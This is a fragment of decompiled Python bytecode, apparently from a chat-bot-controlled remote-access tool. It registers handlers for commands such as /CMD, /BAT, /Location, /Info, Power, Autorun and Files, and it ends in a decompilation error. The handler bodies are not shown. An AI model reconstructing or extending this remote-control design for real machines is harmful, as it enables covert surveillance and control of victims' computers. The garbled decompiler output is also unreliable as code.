             2864  LOAD_ATTR                message_handler
             2866  LOAD_STR                 '/Freeze'
             2868  LOAD_CONST               ('regexp',)
             2870  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1145      2872  LOAD_CODE                <code_object Freeze>
             2874  LOAD_STR                 'Freeze'
             2876  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2878  CALL_FUNCTION_1       1  ''
             2880  STORE_NAME               Freeze

 L.1167      2882  LOAD_NAME                bot
             2884  LOAD_ATTR                message_handler
             2886  LOAD_STR                 '/DVD'
             2888  LOAD_CONST               ('regexp',)
             2890  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1168      2892  LOAD_CODE                <code_object DVD>
             2894  LOAD_STR                 'DVD'
             2896  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2898  CALL_FUNCTION_1       1  ''
             2900  STORE_NAME               DVD

 L.1195      2902  LOAD_NAME                bot
             2904  LOAD_ATTR                message_handler
             2906  LOAD_STR                 '/CMD'
             2908  LOAD_CONST               ('regexp',)
             2910  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1196      2912  LOAD_CODE                <code_object CMD>
             2914  LOAD_STR                 'CMD'
             2916  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2918  CALL_FUNCTION_1       1  ''
             2920  STORE_NAME               CMD

 L.1230      2922  LOAD_NAME                bot
             2924  LOAD_ATTR                message_handler
             2926  LOAD_STR                 '/BAT'
             2928  LOAD_CONST               ('regexp',)
             2930  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1231      2932  LOAD_CODE                <code_object BAT>
             2934  LOAD_STR                 'BAT'
             2936  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2938  CALL_FUNCTION_1       1  ''
             2940  STORE_NAME               BAT

 L.1252      2942  LOAD_NAME                bot
             2944  LOAD_ATTR                message_handler
             2946  LOAD_STR                 '/Location'
             2948  LOAD_CONST               ('regexp',)
             2950  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1253      2952  LOAD_CODE                <code_object Location>
             2954  LOAD_STR                 'Location'
             2956  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2958  CALL_FUNCTION_1       1  ''
             2960  STORE_NAME               Location

 L.1289      2962  LOAD_NAME                bot
             2964  LOAD_ATTR                message_handler
             2966  LOAD_STR                 '/Info'
             2968  LOAD_CONST               ('regexp',)
             2970  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1290      2972  LOAD_CODE                <code_object Info>
             2974  LOAD_STR                 'Info'
             2976  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2978  CALL_FUNCTION_1       1  ''
             2980  STORE_NAME               Info

 L.1326      2982  LOAD_NAME                bot
             2984  LOAD_ATTR                message_handler
             2986  LOAD_STR                 'Help'
             2988  LOAD_STR                 'help'
             2990  BUILD_LIST_2          2 
             2992  LOAD_CONST               ('commands',)
             2994  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1327      2996  LOAD_CODE                <code_object Help>
             2998  LOAD_STR                 'Help'
             3000  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3002  CALL_FUNCTION_1       1  ''
             3004  STORE_NAME               Help

 L.1388      3006  LOAD_NAME                bot
             3008  LOAD_ATTR                message_handler
             3010  LOAD_STR                 '3'
             3012  LOAD_STR                 '6'
             3014  BUILD_LIST_2          2 
             3016  LOAD_CONST               ('commands',)
             3018  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1389      3020  LOAD_CODE                <code_object Main>
             3022  LOAD_STR                 'Main'
             3024  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3026  CALL_FUNCTION_1       1  ''
             3028  STORE_NAME               Main

 L.1392      3030  LOAD_NAME                bot
             3032  LOAD_ATTR                message_handler
             3034  LOAD_STR                 '2'
             3036  LOAD_STR                 '5'
             3038  BUILD_LIST_2          2 
             3040  LOAD_CONST               ('commands',)
             3042  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1393      3044  LOAD_CODE                <code_object Main>
             3046  LOAD_STR                 'Main'
             3048  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3050  CALL_FUNCTION_1       1  ''
             3052  STORE_NAME               Main

 L.1396      3054  LOAD_NAME                bot
             3056  LOAD_ATTR                message_handler
             3058  LOAD_STR                 '4'
             3060  LOAD_STR                 '1'
             3062  BUILD_LIST_2          2 
             3064  LOAD_CONST               ('commands',)
             3066  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1397      3068  LOAD_CODE                <code_object Main>
             3070  LOAD_STR                 'Main'
             3072  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3074  CALL_FUNCTION_1       1  ''
             3076  STORE_NAME               Main

 L.1400      3078  LOAD_NAME                bot
             3080  LOAD_ATTR                message_handler
             3082  LOAD_STR                 'Power'
             3084  LOAD_STR                 'power'
             3086  BUILD_LIST_2          2 
             3088  LOAD_CONST               ('commands',)
             3090  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1401      3092  LOAD_CODE                <code_object Power>
             3094  LOAD_STR                 'Power'
             3096  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3098  CALL_FUNCTION_1       1  ''
             3100  STORE_NAME               Power

 L.1404      3102  LOAD_NAME                bot
             3104  LOAD_ATTR                message_handler
             3106  LOAD_STR                 'Autorun'
             3108  LOAD_STR                 'autorun'
             3110  BUILD_LIST_2          2 
             3112  LOAD_CONST               ('commands',)
             3114  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1405      3116  LOAD_CODE                <code_object Autorun>
             3118  LOAD_STR                 'Autorun'
             3120  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3122  CALL_FUNCTION_1       1  ''
             3124  STORE_NAME               Autorun

 L.1408      3126  LOAD_NAME                bot
             3128  LOAD_ATTR                message_handler
             3130  LOAD_STR                 'Files'
             3132  LOAD_STR                 'files'
             3134  BUILD_LIST_2          2 
             3136  LOAD_CONST               ('commands',)
             3138  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1409      3140  LOAD_CODE                <code_object Files>
             3142  LOAD_STR                 'Files'
             3144  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3146  CALL_FUNCTION_1       1  ''
             3148  STORE_NAME               Files

 L.1412      3150  LOAD_NAME                bot
             3152  LOAD_ATTR                message_handler
             3154  LOAD_STR                 'Cancel'
             3156  BUILD_LIST_1          1 
             3158  LOAD_CONST               ('commands',)
             3160  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1413      3162  LOAD_CODE                <code_object CancelFiles>
             3164  LOAD_STR                 'CancelFiles'
             3166  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3168  CALL_FUNCTION_1       1  ''
             3170  STORE_NAME               CancelFiles

 L.1416      3172  LOAD_NAME                bot
             3174  LOAD_ATTR                message_handler
             3176  LOAD_STR                 'Wallpapers'
             3178  LOAD_STR                 'wallpapers'
             3180  BUILD_LIST_2          2 
             3182  LOAD_CONST               ('commands',)
             3184  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1417      3186  LOAD_CODE                <code_object Wallpapers>
             3188  LOAD_STR                 'Wallpapers'
             3190  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3192  CALL_FUNCTION_1       1  ''
             3194  STORE_NAME               Wallpapers

 L.1421      3196  SETUP_FINALLY      3214  'to 3214'

 L.1422      3198  LOAD_NAME                bot
             3200  LOAD_ATTR                polling
             3202  LOAD_CONST               True
             3204  LOAD_CONST               ('none_stop',)
             3206  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
             3208  POP_TOP          
             3210  POP_BLOCK        
             3212  JUMP_FORWARD       3244  'to 3244'
           3214_0  COME_FROM_FINALLY  3196  '3196'

 L.1423      3214  POP_TOP          
             3216  POP_TOP          
             3218  POP_TOP          

 L.1424      3220  LOAD_NAME                os
             3222  LOAD_METHOD              startfile
             3224  LOAD_NAME                CurrentPath
             3226  CALL_METHOD_1         1  ''
             3228  POP_TOP          

 L.1425      3230  LOAD_NAME                sys
             3232  LOAD_METHOD              exit
             3234  CALL_METHOD_0         0  ''
             3236  POP_TOP          
             3238  POP_EXCEPT       
             3240  JUMP_FORWARD       3244  'to 3244'
             3242  <48>             
           3244_0  COME_FROM          3240  '3240'
           3244_1  COME_FROM          3212  '3212'

Parse error at or near `<117>' instruction at offset 1306

Instruction context:
   
 L. 152      1302  LOAD_NAME                AdminRightsRequired
                1304  LOAD_CONST               True
->              1306  <117>                 0  ''
            1308_1310  POP_JUMP_IF_FALSE  1390  'to 1390'

test/101383.pyc -- 
# decompile failed
